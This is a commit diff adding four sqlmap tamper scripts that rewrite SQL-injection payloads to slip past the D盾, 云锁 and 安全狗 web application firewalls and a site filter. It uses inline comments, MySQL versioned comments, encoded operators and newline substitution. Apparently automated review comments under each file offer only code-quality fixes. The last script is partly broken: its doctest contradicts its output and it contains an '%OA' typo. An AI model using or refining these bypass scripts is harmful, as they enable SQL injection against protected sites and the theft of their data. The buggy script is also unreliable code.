forked from Mr-xn/Penetration_Testing_POC
add sqlmap bypass D盾/云锁/安全狗/空格替换换行 tamper
Showing
5 changed files
with
148 additions
and
0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap_bypass_D盾_tamper | ||
|
||
from lib.core.enums import PRIORITY | ||
__priority__ = PRIORITY.LOW | ||
|
||
|
||
def dependencies(): | ||
pass | ||
|
||
|
||
def tamper(payload, **kwargs): | ||
""" | ||
BYPASS Ddun | ||
""" | ||
retVal = payload | ||
if payload: | ||
retVal = "" | ||
quote, doublequote, firstspace = False, False, False | ||
for i in xrange(len(payload)): | ||
if not firstspace: | ||
if payload[i].isspace(): | ||
firstspace = True | ||
retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" | ||
continue | ||
elif payload[i] == '\'': | ||
quote = not quote | ||
elif payload[i] == '"': | ||
doublequote = not doublequote | ||
elif payload[i] == " " and not doublequote and not quote: | ||
retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" | ||
continue | ||
retVal += payload[i] | ||
return retVal |
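Review bot: The `tamper` docstring (`BYPASS Ddun`) does not describe the transformation, so a reader has to trace the loop to learn what the function emits. From the visible lines it replaces the first whitespace character, and afterwards each space outside single or double quotes, with the constant comment token `/*DJSAWW%2B%26Lt%3B%2B*/`; the docstring should say that and carry a before/after example, as the `%0A` tamper later in this commit does. Writing the constant token into the docstring also tells anyone maintaining WAF or IDS rules exactly which string this module produces. `xrange` is used without an import (the same holds for the `%0A` tamper), so the file presumably only loads under Python 2; `for ch in payload:` would avoid the name.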
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap bypass 云锁 tamper | ||
""" | ||
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) | ||
See the file 'LICENSE' for copying permission | ||
""" | ||
|
||
import re | ||
|
||
from lib.core.data import kb | ||
from lib.core.enums import PRIORITY | ||
from lib.core.common import singleTimeWarnMessage | ||
from lib.core.enums import DBMS | ||
__priority__ = PRIORITY.LOW | ||
|
||
|
||
def dependencies(): | ||
pass | ||
|
||
|
||
def tamper(payload, **kwargs): | ||
payload = payload.replace('ORDER', '/*!00000order*/') | ||
payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select') | ||
payload = payload.replace('CONCAT(', "CONCAT/**/(") | ||
payload = payload.replace("--", " */--") | ||
payload = payload.replace("AND", "%26%26") | ||
return payload |
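Review bot: `tamper` calls `payload.replace(...)` with no emptiness check, so a `None` payload raises `AttributeError`; the other three tampers in this commit guard with `if payload:`, and this one should open with `if not payload: return payload` to match them. The imports `re`, `kb`, `singleTimeWarnMessage` and `DBMS` are never referenced in the visible code and can be dropped. The function has no docstring; it should list the five substitutions and state that the `/*!00000...*/` versioned-comment form is MySQL syntax, so the output is only meaningful against that backend.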
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap_bypass_安全狗_tamper | ||
|
||
from lib.core.enums import PRIORITY | ||
from lib.core.settings import UNICODE_ENCODING | ||
__priority__ = PRIORITY.LOW | ||
def dependencies(): | ||
pass | ||
def tamper(payload, **kwargs): | ||
|
||
if payload: | ||
payload=payload.replace(" ","/*!*/") | ||
payload=payload.replace("=","/*!*/=/*!*/") | ||
payload=payload.replace("AND","/*!*/AND/*!*/") | ||
payload=payload.replace("UNION","union/*!88888cas*/") | ||
payload=payload.replace("#","/*!*/#") | ||
payload=payload.replace("USER()","USER/*!()*/") | ||
payload=payload.replace("DATABASE()","DATABASE/*!()*/") | ||
payload=payload.replace("--","/*!*/--") | ||
payload=payload.replace("SELECT","/*!88888cas*/select") | ||
payload=payload.replace("FROM","/*!99999c*//*!99999c*/from") | ||
print payload | ||
|
||
return payload |
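Review bot: The `print payload` line inside `tamper` is leftover debugging and should be removed. It writes every rewritten payload to stdout, where it mixes into the tool's own output and any captured logs, and as a Python 2 print statement it is a syntax error under Python 3. `UNICODE_ENCODING` is imported but not used in the visible code. The function also lacks a docstring naming the substitutions it performs and the backend they assume.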
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap_bypass_某企业建站程序过滤_tamper | ||
|
||
""" | ||
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) | ||
See the file 'LICENSE' for copying permission | ||
""" | ||
|
||
from lib.core.enums import PRIORITY | ||
|
||
__priority__ = PRIORITY.LOW | ||
|
||
def dependencies(): | ||
pass | ||
|
||
def tamper(payload, **kwargs): | ||
""" | ||
把空格替换成换行符:%0A | ||
Replaces space character (' ') with comments '%0A' | ||
Tested against: | ||
* Microsoft SQL Server 2005 | ||
* MySQL 4, 5.0 and 5.5 | ||
* Oracle 10g | ||
* PostgreSQL 8.3, 8.4, 9.0 | ||
Notes: | ||
* Useful to bypass weak and bespoke web application firewalls | ||
>>> tamper('SELECT id FROM users') | ||
'SELECT%0Aid%0AFROM%0Ausers' | ||
""" | ||
|
||
retVal = payload | ||
|
||
if payload: | ||
retVal = "" | ||
quote, doublequote, firstspace = False, False, False | ||
|
||
for i in xrange(len(payload)): | ||
if not firstspace: | ||
if payload[i].isspace(): | ||
firstspace = True | ||
retVal += "/%OA/" | ||
continue | ||
|
||
elif payload[i] == '\'': | ||
quote = not quote | ||
|
||
elif payload[i] == '"': | ||
doublequote = not doublequote | ||
|
||
elif payload[i] == " " and not doublequote and not quote: | ||
retVal += "/%0A/" | ||
continue | ||
|
||
retVal += payload[i] | ||
|
||
return retVal |
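Review bot: The docstring does not match what `tamper` emits, so the doctest in it cannot pass. It promises `'SELECT%0Aid%0AFROM%0Ausers'`, but the space branch appends `/%0A/` (with slashes) and the first-whitespace branch appends `/%OA/`, spelled with the letter O rather than a zero. The summary line also calls `%0A` a comment, although it is a URL-encoded line feed. The two branches and the docstring should use one token, with the example regenerated from the actual output. The "Tested against" list looks carried over from a stock sqlmap tamper; drop it unless it was re-verified for this variant.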